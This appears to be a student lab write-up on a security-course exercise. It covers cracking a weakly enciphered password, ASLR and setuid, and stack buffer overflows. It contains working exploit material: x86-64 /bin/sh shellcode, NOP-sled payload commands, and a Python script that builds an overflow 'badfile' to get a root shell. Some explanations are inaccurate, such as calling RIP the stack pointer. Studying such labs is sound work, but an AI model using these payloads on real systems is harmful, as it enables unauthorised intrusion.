# 1
Victim Machine : `10.0.2.14`
Viewing website : `http://10.0.2.14/base`
Running `ls` doesn't return anything:
Running: `man` results in the following:
`http://10.0.2.14/xyz`
```
xT jE iJ xJ zA jD :: zR jE hK zH zA hF fC iJ zA yD zA lH
r o s h a n r o s h a n i s a c a t
buffer [x]
return [x]
roshan
shabby [x]
kernel [x]
kitkat [x]
a b c d e f g h i j k l m n o p q r s t u v w x y z
1 2 3 4 5 6 7 8 9 1011121314151617181920212223242526
lowercase -> 37 to 72
Uppercase -> 1 to 36
j => 36
D => 4
36+4 mod 26 = 14 (n)
x => 24+26
T => 20
(50 + 20) mod 26 = 18 (r)
```
It is definitely insecure because the cipher text is encrypted using the sum of 2 index of alphabet and then modded with 26. Assuming that the Uppercase alphabet is the starts at 1-26 and the lowercase start at 27-52, the some of the 2 indexes are modded with 26 to get the alphabet with the resulting index.
Deciphered credentials:
Username : `roshan`
Password : `roshanisacat`
It is weak because it contains repeating ciphered text, which can be exploited since there is partial knowledge that comes from the username. The password also contains the username string so there is a chance that the ciphertext can repeat. This repetition is the reason why the password can be broken as through trial and error, we can get the method of generating the cipher and reverse engineer the method to get all the other characters in the password.
# 2
The current value is 0 and it means that ASLR is disabled. Normally, Linux kernals have ASLR enabled with the value 2 by default. ASLR means Address Space Layout Randomization, and it helps to prevent buffer overflow by randomizing the address space positions.
# 3
We notice that the execute permission for the owner is a lower-case āsā instead of the usual `x`. This `s` indicates the file has the setuid bit set. The passwd command will always run with root privileges no matter who launches it because the owner of the file is root.
The method is vulnerable because read() function does not have built-in bounds checking and can potentially read more data than the size of the buffer, leading to buffer overflow vulnerabilities. Since the buffer is only limited to 600, the read function reads up to 1000, therefore leading to buffer overflow in buffer[].
`size_t read(int fd, void *buf, size_t count);`
The method recommended to use instead of read() to prevent buffer overflow is fgets().
The fgets() function is safer because it allows you to specify the maximum number of characters to read, thus preventing buffer overflow. It reads at most one less than the specified number of characters and automatically appends a null character ('\0') to the end of the input, ensuring that the input is properly terminated as a C string.
The significance of the main() function is that it serves as the entry point for execution of a C program. When a C program is executed, the operating system starts by calling the main() function. It is the starting point from which the program's instructions are executed, and it is the mandatory function that must be defined in every C program. The main() function typically contains the program's logic and controls the flow of execution.
# 4
This command executes your program with the specified input. The < <() syntax is used to redirect the output of the Python command into the input of the program being debugged. The idea is to run a print command as an input for the `vuln` c program, to debug and see if it can fit in the array.
When a program receives a SIGSEGV signal, it means that it has performed an invalid memory access operation, and the operating system sends this signal to terminate the program.
In the context of debugging with gdb-peda, if you encounter a SIGSEGV error, it indicates that your program has crashed due to a segmentation fault. This error indicates that the program was about to overflow and was interrupted before it actually did.
Value of RBP : `0x41414141 ...` -> AAAAAA
Value of RIP : `0x40068a (vuln+45: ret)`
RBP is a register that points to the base of the current stack frame. It helps in referencing local variables and parameters within the current function, which wold contain the current variable being printed. The content is AAAAAAA because it's the content of the variable.
The value of RIP is the address of where the next instructions are going to be executed. Since this is an important address, the program is stopped in order to make sure that this value is not overwritten by the overflowing variable value.
The RBP (Base Pointer) register is used in function prologues and epilogues to establish a fixed reference point within the function's stack frame. It serves as a frame pointer, allowing efficient access to local variables and function parameters.
When calculating offsets within a function's stack frame, the RBP register is crucial because it provides a consistent reference point. By subtracting a fixed offset from the RBP, we can access specific locations relative to the base of the stack frame.
# 5
`Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B`
offset = `608`
We use RBP to help calculate the offset because after the RBP is the RIP (Stack pointer), which if the buffer overflow starts to do, would replace the content in the memory address.
Running command:
` run < <(python -c 'print "A"*616 + "\x41\x41\x41\x41\x41\x41\x00\x00"')`
# 6
```
run < <(python -c "print '\x90'*488 + '\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05' + '\x90'*100 + '\x41\x41\x41\x41\x41\x41\x41\x41'*10")
```
A NOP (No Operation) is an assembly instruction that performs no meaningful operation. It is often used in techniques like the NOP sled or NOP slide, where multiple NOP instructions are arranged in a sequence. This has practical applications in buffer overflow attacks.
In a buffer overflow attack, the attacker aims to overwrite the return address of a function to redirect the program's execution to their malicious code. By incorporating a NOP slide before the exploit code, the attacker increases the chances of successfully reaching the malicious code.
The NOP slide creates a larger target for the return address. When the return address points to the NOP region, the execution will slide down the NOP instructions until it reaches the actual exploit code. As a result, the attacker does not need to precisely determine the exact memory address of the exploit code.
By using a NOP slide, the attacker maximizes the probability of hitting the correct memory location for their exploit, simplifying the process of launching the attack.
Processor architectures such as x86 and ARM stores data in little-endian order, which mean it stores the least-significant byte at the smallest memory address.
`(python -c "print '\x90'*488 +'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05' + '\x90'*100 +'\x41\x41\x41\x41\x41\x41\x41\x41'*10"; cat) | ./vuln`
The cat command acts as a conduit, allowing the generated payload to be fed as input to the vuln program. It ensures that the payload is passed correctly to trigger the desired vulnerability and exploit within the vulnerable program.
```
[dssm@mssd-bo dssm]$ cat flag.txt
cat flag.txt
dssm::noitismssd
```
# 6b
The -z execstack option enables the execution of code from the stack. Without this option, the program may fail to run correctly due to modern security mechanisms that mark the stack as non-executable.
```
gcc -z execstack -o shellcode shellcode.c
```
Shell obtained after running the compiled code.
# 7
Size of buffer we need to overflow : 100 bytes
size of the shell code = 30 bytes
```
"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
```
start = 70
Initial running of the program doesn't work.
To find the bof breakpoint we generate the 1000 char string and then we run to see where the address is. And to find the overflow address, we change the content of the badfile:
```python=
import os
import sys
content =
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4A\
c5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0\
Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah\
6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1A\
k2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7\
Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap\
3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8A\
r9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4\
Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax\
0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5A\
z6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1\
Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be\
7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
with open('badfile', 'w') as f:
f.write(content)
```
By doing this we have changed the content of the badfile and found where the overflow starts.
Content of RBP:
```
d7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3
```
```python=
#!/usr/bin/python3
import sys
# Replace the content with the actual shellcode
shellcode= (
"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
).encode('latin-1')
# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
##################################################################
# Put the shellcode somewhere in the payload
start = 200 # Change this number
content[start:start + len(shellcode)] = shellcode
# Decide the return address value
# and put it somewhere in the payload
ret = 0x7fffffffe2ab # Change this number (initially random before we can start finding the actual address)
offset = 120 # Change this number
L=8 #8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little')
##################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
f.write(content)
```
The program exploit will generate a file called `badfile` which will be read by the stack program when its executed in the main function. The stack program will then attempt to execute bof() function, which tries to perform a strcpy() with the badfile as source, and the buffer size of 24 bytes as its destination, thus a buffer overflow will occur.
We have found the offset and it cna be used for the exploit now.
offset = 112 + 8 = 120
Once we regenerate the `badfile`, we can restart the gdb and find the general location of the NOP.
We can see that generally the area containing NOP will contain `0x9090909090`
`x/200x $rsp`
Through trial and error, we can find that the syscall command is at `0x00007fffffffe250`
A diagram of the attack:
Sign in with Wallet
Connect another wallet